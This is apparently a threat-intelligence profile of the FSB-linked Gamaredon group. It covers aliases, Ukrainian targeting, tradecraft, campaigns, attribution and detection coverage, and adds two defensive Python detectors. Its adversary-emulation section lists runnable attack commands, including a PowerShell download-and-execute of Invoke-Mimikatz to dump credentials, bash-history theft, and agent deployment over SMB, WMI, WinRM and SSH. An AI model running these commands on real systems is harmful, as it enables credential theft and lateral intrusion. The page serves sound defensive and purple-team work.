
Gamaredon Group

gamaredon · russia · active since 2013-06

Gamaredon Group (IRON TILDEN / Primitive Bear / ACTINIUM / Armageddon / Shuckworm / DEV-0157 / Aqua Blizzard / NastyShrew / BlueAlpha / Trident Ursa / UAC-0010 / G0047) is a Russian state-sponsored cyber-espionage actor formally attributed to the Russian Federal Security Service (FSB) Center 18 (Information Security Center) operating from FSB facilities in occupied Crimea and Sevastopol.

Active since June 2013, only months before the Russian annexation of Crimea, Gamaredon is the longest-running and highest-tempo Russian state-actor cluster focused exclusively on Ukrainian targets and represents the FSB's primary Ukraine-collection capability, operating in parallel with GRU clusters (Sandworm, APT28) and the SVR (APT29). The November 4, 2021 Ukrainian SSU formal public attribution named specific FSB officers operating from the 4th Section of the SCO, FSB Department in occupied Crimea and Sevastopol, among the most comprehensive public attributions of a Russian-state cyber operator to a specific FSB unit and named officers.

Targeting is overwhelmingly concentrated on Ukrainian government, military, intelligence services, law enforcement, judiciary, emergency services, energy and critical infrastructure, NGOs and humanitarian-aid organizations, universities, media, journalists, and opposition political parties.

Tradecraft hallmarks include extreme high-tempo spear-phishing operations with Pterodo (Pteranodon) backdoor attachments; RTF template injection (T1221; Proofpoint in December 2021 documented Gamaredon as the technique innovator, subsequently copied broadly); the long-running Pterodo / Pteranodon implant family with continuous variant evolution; the PowerPunch PowerShell loader; the QuietSieve info stealer; the broader GammaSteel/GammaDrop/GammaLoad/GiDDome/DinoTrain implant family; PteroLNK USB-worm propagation into air-gapped Ukrainian government networks; Cloudflare CDN abuse for C2 (Recorded Future BlueAlpha tracking); fast-flux DNS infrastructure (Silent Push, September 2023: 71-IP infrastructure); Telegram C2 channels; coordination with the stealthier InvisiMole cluster for access handoff on select high-value targets (ESET multi-year tracking); and a 'volume over stealth' approach (Microsoft naming convention) that prioritizes broad sustained targeting over single-target stealth.

The October 2021 - February 2022 pre-invasion targeting surge against Ukrainian emergency-response and humanitarian-aid organizations (Microsoft MSTIC February 2022) and sustained operational tempo through and after the February 2022 Russian invasion demonstrate Gamaredon's role as the strategic-intelligence-collection arm of Russian wartime cyber operations.

Country: Russia · Confidence: high · 42 aliases · MITRE ATT&CK G0047

Profile

Gamaredon Group (IRON TILDEN / Primitive Bear / ACTINIUM / Armageddon / Shuckworm / DEV-0157 / Aqua Blizzard / NastyShrew / BlueAlpha / Blue Otso / Dancing Salome / Trident Ursa / UAC-0010 / UNC530 / Winterflounder / G0047) is a Russian state-sponsored cyber-espionage actor formally attributed to the Russian Federal Security Service (FSB) Center 18 (Information Security Center) operating from FSB facilities in occupied Crimea and Sevastopol. Active since June 2013, only months before the Russian annexation of the Crimean Peninsula in March 2014, Gamaredon is the longest-running and highest-tempo Russian state-actor cluster focused exclusively on Ukrainian targets and represents the FSB's primary Ukraine-collection capability, operating in parallel with GRU clusters (Sandworm, APT28) and the SVR (APT29). The November 4, 2021 Ukrainian Security Service (SSU) formal public attribution named specific FSB officers operating from the 4th Section of the SCO, FSB Department in occupied Crimea and Sevastopol, among the most comprehensive public attributions of a Russian-state cyber operator to a specific FSB unit and named officers. The April 2022 Five Eyes joint cybersecurity advisory acknowledged industry-identified FSB links. SSU has also tied operations to FSB Center 16 (electronic and signals intelligence). Gamaredon's near-exclusive Ukraine focus has resulted in vastly more public operational data than for any other Russian state cluster; Ukrainian authorities and Ukraine-focused vendors have published more Gamaredon TTPs, IOCs, and named-operator information than for any comparable cluster.
Targeting is overwhelmingly concentrated on Ukrainian government (cabinet ministries, presidential administration, foreign ministry), military (Armed Forces of Ukraine, territorial defense forces), intelligence services (SBU), law enforcement (police, prosecutor's offices), judiciary, emergency services, energy and critical infrastructure operators, NGOs and humanitarian-aid organizations, universities, media organizations, journalists, and opposition political parties. Secondary targeting includes Western diplomatic missions and government entities operating in Ukraine, with limited expansion to broader Eastern European and Baltic targets aligned with FSB regional interests.

Tradecraft hallmarks distinguish Gamaredon as the noisy-but-effective Russian state-actor cluster:

(a) extreme high-tempo operations: spear-phishing waves with Pterodo (Pteranodon) backdoor attachments and Office-template injection sent to tens of thousands of Ukrainian targets monthly;

(b) sustained use of weaponized Office documents (RTF template injection, T1221; Proofpoint in December 2021 documented Gamaredon as the innovator, subsequently copied broadly across APT and criminal ecosystems);

(c) the Pterodo / Pteranodon implant family, Gamaredon's signature long-running custom backdoor with continuous variant evolution;

(d) the PowerPunch PowerShell loader;

(e) the QuietSieve info stealer;

(f) GammaSteel, GammaDrop, GammaLoad, GiDDome, DinoTrain, DesertDown, DilongTrash, ObfuBerry and ObfuMerry as the broader implant family;

(g) PteroLNK USB-worm propagation (T1091) for lateral movement across air-gapped Ukrainian government networks;

(h) GammaDrop and PteroSand secondary stagers;

(i) Cloudflare CDN abuse for C2 (Recorded Future BlueAlpha tracking);

(j) fast-flux DNS infrastructure (Silent Push, September 2023: a 71-IP infrastructure with significant ASN/IP diversity);

(k) Telegram-based C2 channels;

(l) coordination with the stealthier InvisiMole cluster for access handoff on select high-value targets (ESET multi-year tracking);

(m) commodity-tool abuse including Remcos (Cisco Talos, March 2025);

(n) a 'volume over stealth' approach (Microsoft naming convention): Gamaredon prioritizes broad, sustained targeting over single-target stealth.
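Item (b) above is the technique most directly testable from the file itself: an RTF template injection document carries a `\*\template` destination whose target is a remote resource that Word fetches on open. The following scanner is an added example written for this page, not code from the page or from any vendor report; it walks the RTF destination group, decodes the standard `\'hh` hex escapes (which are also used to disguise the URL) and flags targets that live off-host. The sample documents and URLs are constructed for the demo.

```python
"""Detect RTF template injection (ATT&CK T1221): an RTF whose \\*\\template
destination points at a remote resource Word will fetch when the file is opened.
Added example for this page, not the page's or any vendor's code; the sample
documents and URLs below are constructed."""
import re
from typing import Dict, List

# Control word that opens the template destination group: {\*\template <target>}
_TEMPLATE_CW = re.compile(rb"\\\*\\template(?![A-Za-z])")

# Prefixes that mean the template lives off-host (URL schemes or a UNC path).
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "file://", "\\\\")


def _group_payload(data: bytes, start: int) -> bytes:
    """Bytes from `start` up to the brace that closes the enclosing RTF group."""
    depth = 0
    for i in range(start, len(data)):
        b = data[i:i + 1]
        if b == b"{":
            depth += 1
        elif b == b"}":
            if depth == 0:
                return data[start:i]
            depth -= 1
    return data[start:]


def _rtf_text(payload: bytes) -> str:
    """Reduce an RTF destination payload to plain text: drop control words and
    braces, honour the \\\\ \\{ \\} escapes, decode \\'hh hex escapes.
    Assumes a single-byte (latin-1) target string."""
    out: List[str] = []
    i, n = 0, len(payload)
    while i < n:
        c = payload[i:i + 1]
        if c != b"\\":
            if c not in (b"{", b"}"):          # group braces carry no text
                out.append(c.decode("latin-1"))
            i += 1
            continue
        nxt = payload[i + 1:i + 2]
        if nxt in (b"\\", b"{", b"}"):         # escaped literal character
            out.append(nxt.decode("latin-1"))
            i += 2
        elif nxt == b"'":                      # \'hh hex escape
            try:
                out.append(chr(int(payload[i + 2:i + 4], 16)))
            except ValueError:
                pass                           # malformed escape: skip it
            i += 4
        elif nxt.isalpha():                    # control word [+ number] [+ one space]
            j = i + 1
            while j < n and payload[j:j + 1].isalpha():
                j += 1
            if payload[j:j + 1] == b"-":
                j += 1
            while j < n and payload[j:j + 1].isdigit():
                j += 1
            if payload[j:j + 1] == b" ":
                j += 1
            i = j
        else:                                  # control symbol such as \~ or \_
            i += 2
    return "".join(out).strip()


def extract_template_targets(rtf: bytes) -> List[str]:
    """Every template destination declared in the document (normally 0 or 1)."""
    return [_rtf_text(_group_payload(rtf, m.end())) for m in _TEMPLATE_CW.finditer(rtf)]


def assess_rtf(rtf: bytes) -> Dict[str, object]:
    """Verdict for one RTF blob: which declared template targets are remote."""
    targets = extract_template_targets(rtf)
    remote = [t for t in targets if t.lower().startswith(REMOTE_PREFIXES)]
    return {"templates": targets, "remote_templates": remote, "suspicious": bool(remote)}


# Constructed samples (not real lure documents): a plain remote template, the same
# kind of URL hidden behind \'hh hex escapes, and a benign local template path.
SAMPLE_PLAIN = (b"{\\rtf1\\ansi{\\*\\template http://template.invalid/docs/t1221.dotm}"
                b"\\pard Quarterly report\\par}")
SAMPLE_HEX = (b"{\\rtf1\\ansi{\\*\\template \\'68\\'74\\'74\\'70\\'73://cdn.example.invalid/x.dotm}"
              b"\\pard Hello\\par}")
SAMPLE_BENIGN = (b"{\\rtf1\\ansi{\\*\\template C:\\\\Users\\\\me\\\\Templates\\\\Normal.dotm}"
                 b"\\pard Hello\\par}")

if __name__ == "__main__":
    for name, doc in (("plain", SAMPLE_PLAIN), ("hex", SAMPLE_HEX), ("benign", SAMPLE_BENIGN)):
        print(name, assess_rtf(doc))
```

The scanner only looks at the RTF `\*\template` destination; template injection delivered through OOXML (`attachedTemplate` relationship in `word/_rels/settings.xml.rels`) needs a separate check, and a target that passes here is still worth resolving against your proxy and DNS logs, since the fetch happens at document-open time.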

The October 2021 - February 2022 pre-invasion targeting surge against Ukrainian emergency-response and humanitarian-aid coordination organizations (Microsoft MSTIC February 2022) and the sustained operational tempo through the February 2022 Russian invasion and beyond demonstrate Gamaredon's role as a strategic-intelligence-collection arm of Russian wartime cyber operations. While Gamaredon itself does not conduct destructive operations (WhisperGate and HermeticWiper were attributed to GRU Sandworm subclusters), its persistent-access establishment likely supports broader Russian intelligence-requirement and target-list maintenance for destructive operators when access handoff is operationally appropriate.
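Tradecraft item (j) in the profile above, fast-flux DNS, shows up in resolution history as one domain cycling through many IPs across several ASNs with short TTLs. The following scorer is an added example written for this page, not code from the page or from Silent Push; it groups passive-DNS style records per domain and flags the ones whose IP and ASN diversity and TTL cross illustrative thresholds. The thresholds, the `Resolution` record shape and the sample records are all assumptions constructed for the demo, not published figures.

```python
"""Score domains for fast-flux behaviour from passive-DNS style resolution records.
Added example for this page, not the page's or Silent Push's code; thresholds and
records are constructed."""
from collections import defaultdict
from dataclasses import dataclass
from statistics import median
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class Resolution:
    domain: str
    ip: str
    asn: int   # origin AS of `ip`, resolved out of band (e.g. from a BGP feed)
    ttl: int   # TTL on the returned A record, in seconds


# Illustrative thresholds (assumptions): tune against your own resolver baseline,
# since large CDNs also spread a name across many IPs within one or two ASNs.
MIN_DISTINCT_IPS = 8
MIN_DISTINCT_ASNS = 3
MAX_MEDIAN_TTL = 300


def summarize(records: Iterable[Resolution]) -> Dict[str, dict]:
    """Per-domain IP/ASN diversity and median TTL, plus the fast-flux verdict."""
    by_domain: Dict[str, List[Resolution]] = defaultdict(list)
    for r in records:
        by_domain[r.domain].append(r)
    summary: Dict[str, dict] = {}
    for domain, rs in by_domain.items():
        ips = {r.ip for r in rs}
        asns = {r.asn for r in rs}
        ttl = median(r.ttl for r in rs)
        summary[domain] = {
            "distinct_ips": len(ips),
            "distinct_asns": len(asns),
            "median_ttl": ttl,
            "fast_flux": (len(ips) >= MIN_DISTINCT_IPS
                          and len(asns) >= MIN_DISTINCT_ASNS
                          and ttl <= MAX_MEDIAN_TTL),
        }
    return summary


def flagged_domains(records: Iterable[Resolution]) -> List[str]:
    """Domains whose resolution history meets all three flux criteria."""
    return sorted(d for d, s in summarize(records).items() if s["fast_flux"])


# Constructed records (documentation IP ranges, private-use ASNs), not observations:
# one fluxing domain (10 IPs over 4 ASNs, 60 s TTL), one CDN-fronted domain
# (4 IPs in one ASN) and one static host.
SAMPLE_RECORDS = (
    [Resolution("flux.example.invalid", f"203.0.113.{i}", 64512 + (i % 4), 60) for i in range(10)]
    + [Resolution("cdn.example.invalid", f"198.51.100.{i}", 64520, 300) for i in range(1, 5)]
    + [Resolution("www.example.invalid", "192.0.2.10", 64530, 3600)] * 3
)

if __name__ == "__main__":
    for domain, stats in summarize(SAMPLE_RECORDS).items():
        print(domain, stats)
    print("flagged:", flagged_domains(SAMPLE_RECORDS))
```

In practice the records come from a passive-DNS store or resolver logs over a window of days, and the ASN column is what separates flux from a CDN: a 71-IP footprint spread over many unrelated networks, as described for this actor, scores very differently from 71 IPs inside a single provider's AS.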

Aliases (42)

gamaredon, gamaredon group, iron tilden, iron_tilden, primitive bear, primitive_bear, actinium, armageddon, armagedon, shuckworm, dev-0157, dev_0157, aqua blizzard, aqua_blizzard, nastyshrew, nasty shrew, bluealpha, blue alpha, blue otso, blue_otso, dancing salome, dancing_salome, trident ursa, trident_ursa, uac-0010, uac_0010, unc530, unc 530, winterflounder, winter_flounder, winterflouder, fsb, fsb center 18, fsb 18th center, fsb information security center, fsb center 16, fsb 16th center, 4th section sco, fsb crimea, fsb sevastopol, russian federal security service, g0047

Adversary Emulation Plan (13 steps)

Runnable Caldera emulation profile: Worm (Move laterally any way possible). Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.

0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list

1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null

2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json

3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a

Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds

5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}

6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}

Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}

Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";

9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;

Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";

Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;

12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns (14)

2025: LNK Files Distributing Remcos Backdoor (Cisco Talos March 2025)
2024-2026: Sustained War-Period Operations (2024-2026)
2024: ESET Comprehensive Toolset Analysis (September 2024)
2023: Fast-Flux Infrastructure Discovery (Silent Push September 2023)
2022: Trident Ursa Invasion-Period Operations (Unit 42 February-December 2022)
2021-2022: Pre-Invasion Targeting Surge (October 2021 - February 2022)
2021: Novel RTF Template Injection Technique (Proofpoint December 2021)
2021: SSU Formal FSB Center 18 Attribution (November 4, 2021)
2020: Gamaredon Group Grows Its Game (ESET June 2020)
2020: COVID-Themed Lure Campaigns (April-May 2020)
2018-2025: InvisiMole Target Handoff Pattern (ESET multi-year)
2018: Ukrainian SSU First Public FSB Attribution (November 2018)
2017: Pteranodon Toolset Evolution Disclosure (Unit 42 February 2017)
2015: LookingGlass Operation Armageddon Initial Disclosure (April 2015)

Attribution & Reporting

Attributed by

Ukrainian Security Service (SSU), Ukrainian CERT-UA, State Service of Special Communications and Information Protection of Ukraine, FBI, CISA, NSA, US Cyber Command, UK NCSC, Australia ACSC, Canadian Centre for Cyber Security, New Zealand NCSC, Five Eyes, Estonia CERT-EE, Microsoft, Microsoft Threat Intelligence Center (MSTIC), Mandiant, FireEye, Google Cloud Threat Intelligence, CrowdStrike, Kaspersky GReAT, ESET, Symantec / Broadcom, Trend Micro, SentinelOne, Palo Alto Networks Unit 42, Cisco Talos, Recorded Future, Insikt Group, SecureWorks, Check Point Research, Proofpoint, Volexity, LookingGlass, Silent Push, Hunt.io, Cloudflare

Key reporting

Ukrainian Security Service (SSU): Technical Report on Armageddon Group Operations (November 2021)
Ukrainian CERT-UA: UAC-0010 Threat Tracking (multiple)
Microsoft Threat Intelligence Center: ACTINIUM Targets Ukrainian Organizations (February 4, 2022)
Palo Alto Networks Unit 42: Russia's Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (February 3, 2022)
Palo Alto Networks Unit 42: Trident Ursa Cyber Conflict Operations Unwavering Since Invasion of Ukraine (December 20, 2022)
ESET: Gamaredon Group Grows Its Game (June 11, 2020)
ESET: Cyberespionage the Gamaredon Way, Analysis of Toolset Used to Spy on Ukraine in 2022 and 2023 (September 26, 2024)
Symantec Threat Hunter Team: Shuckworm Continues Cyber-Espionage Attacks Against Ukraine (multiple, 2022-2025)
Cisco Talos: Gamaredon Campaign Abuses LNK Files to Distribute Remcos Backdoor (March 28, 2025)
Cisco Talos: Network Footprints of Gamaredon Group (2022)
Proofpoint: Injection is the New Black, Novel RTF Template Inject Technique (December 1, 2021)
LookingGlass: Operation Armageddon, Cyber Espionage as a Strategic Component of Russian Modern Warfare (April 2015)
Silent Push: From Russia with a 71, Uncovering Gamaredon's Fast Flux Infrastructure (September 7, 2023)
Hunt.io: State-Sponsored Tactics, How Gamaredon and ShadowPad Operate and Rotate Their Infrastructure (April 8, 2025)
Cloudflare: 2026 Cloudflare Threat Report (March 3, 2026)
Kaspersky GReAT: Gamaredon Deploys Pterodo Against Ukraine
Recorded Future: BlueAlpha Network Infrastructure (Cloudflare CDN Abuse)
CERT-EE (Estonia): Gamaredon Infection, From Dropper to Entry (January 2021)
Five Eyes Joint Cybersecurity Advisory: Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure (April 20, 2022)
CrowdStrike: Adversary Profile, PRIMITIVE BEAR
SecureWorks: IRON TILDEN Threat Group Profile
SOCRadar: Dark Web Profile, Gamaredon APT
EuRepoC: APT Profile, Gamaredon Group
Council on Foreign Relations: Gamaredon Cyber Operations Tracker

Operational

State sponsor

Russian Federation, Federal Security Service (FSB) Center 18 (Information Security Center), operating from FSB facilities in occupied Crimea and Sevastopol. The November 4, 2021 Ukrainian Security Service (SSU) public attribution named specific FSB officers and tied operations to the 4th Section of the SCO, FSB Department in occupied Crimea and Sevastopol. SSU has also tied operations to FSB Center 16 (electronic and signals intelligence).

The April 2022 Five Eyes joint cybersecurity advisory acknowledged industry-identified FSB links. The group has been active since at least June 2013, only months before the Russian annexation of the Crimean Peninsula.

Motivations
espionage, intelligence_gathering, geopolitical_collection, ukraine_focused_intelligence, military_intelligence, government_intelligence, tactical_battlefield_intelligence, crimea_aligned_operations, regional_dominance, opportunistic_disruption, access_handoff_to_other_clusters, sabotage

Detection Blind Spots (60 techniques)

Across this actor's 60 mapped techniques, the share covered by each detection layer. Low bars are where you'd be blind if this actor targeted you.

Behavioral / log (Sigma): 56/60 (93%)
Analytics (MITRE CAR): 33/60 (55%)
Runtime / container (Falco): 4/60 (6%)
File / malware (YARA): 0/60 (0%)
Network (Suricata/Snort): 14/60 (23%)
Vuln scan (Nuclei): 0/60 (0%)

Atomic Test Plan (30 techniques)

Runnable Atomic Red Team tests covering this actor's mapped techniques: validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use.
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin